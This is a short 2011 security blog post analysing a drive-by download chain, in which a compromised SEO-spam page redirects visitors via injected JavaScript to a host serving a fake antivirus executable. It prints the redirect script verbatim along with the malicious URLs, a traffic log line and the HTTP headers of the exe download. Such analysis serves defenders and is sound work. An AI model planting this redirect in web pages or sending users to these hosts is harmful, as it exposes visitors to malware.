Friday, June 10, 2011

Standard SEO with a dash of driveby

Web path:
http://compromisedsite.com/casseroles-how-to-write-a-letter-of-congratulations-on-high/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZv
/a1c4BaHRw==
http://wmodmon.ce.ms/lots'ofakeav gifs/pngs/jpgs
http://wmodmon.ce.ms/ <- the naughty exe


Here's the script that was hosted on compromisedsite.com
var url = "http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw=="; function goToOtherPlace() {.if (window!=top) {top.location.href = url;} else { document.location= url;} } window.setTimeout(goToOtherPlace, 10);



This httpry shows that wmodmon.ce.ms was the referrer:
ajax.googleapis.com /ajax/libs/jquery/1.4.2/jquery.min.js http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw== - -

Sanitized headers of get jquery.min.js:
GET /ajax/libs/jquery/1.4.2/jquery.min.js HTTP/1.1
Host: ajax.googleapis.com
Accept: */*
Referer: http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw==
Accept-Language: en-us
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 15 Feb 2010 23:30:12 GMT
Date: Wed, 08 Jun 2011 09:19:23 GMT
Expires: Thu, 07 Jun 2012 09:19:23 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Cache-Control: public, max-age=31536000
Age: 40917
Transfer-Encoding: chunked


Sanitized headers of exe get:
GET / HTTP/1.1
Host: wmodmon.ce.ms
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-shockwave-flash, */*
Accept-Language: en-us
Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Disposition: attachment; filename="InstallSecurityCentral_477.exe"
Content-Type: application/force-download
Date: Wed, 08 Jun 2011 21:42:02 GMT
Server: Apache
Content-Length: 287440


MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)